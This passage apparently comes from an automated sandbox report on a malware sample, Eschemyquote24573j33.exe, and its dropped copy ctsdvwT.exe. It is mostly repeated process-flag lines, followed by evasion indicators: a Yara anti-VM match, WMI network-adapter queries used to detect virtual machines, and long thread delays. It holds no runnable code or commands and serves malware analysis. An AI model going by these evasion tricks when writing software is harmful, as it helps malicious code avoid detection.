                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: Eschemyquote24573j33.exe PID: 4332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 7104, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeMemory allocated: 2750000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeMemory allocated: 2900000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeMemory allocated: 2770000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeMemory allocated: 7AB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeMemory allocated: 8AB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeMemory allocated: 8C70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeMemory allocated: 9C70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeMemory allocated: 3270000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeMemory allocated: 3310000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeMemory allocated: 5310000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 1280000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2C90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2AB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 79E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 89E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 8B90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 9B90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 1870000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 3390000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 31A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 13C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2E40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2B90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 7BA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 8BA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 8D50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 9D50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 1810000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 3190000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 5190000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2400000Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2399875Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2399765Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2399654Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2399546Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2399431Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2399327Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2399216Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2399109Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2399000Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2398890Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2398780Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2398671Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2398562Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2398451Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2398343Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2398234Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2398125Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2397955Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2397750Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2397637Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2397529Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2397389Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2397281Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2397171Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2397059Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2396953Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2396843Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2396734Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2396625Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2396515Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2396406Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2396296Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2396187Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2396078Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2395968Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2395859Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2395750Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2395640Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2395531Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2395421Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2395282Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2395164Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2395052Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2394937Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2394828Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2394718Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2394607Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2394500Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2394390Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2394281Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
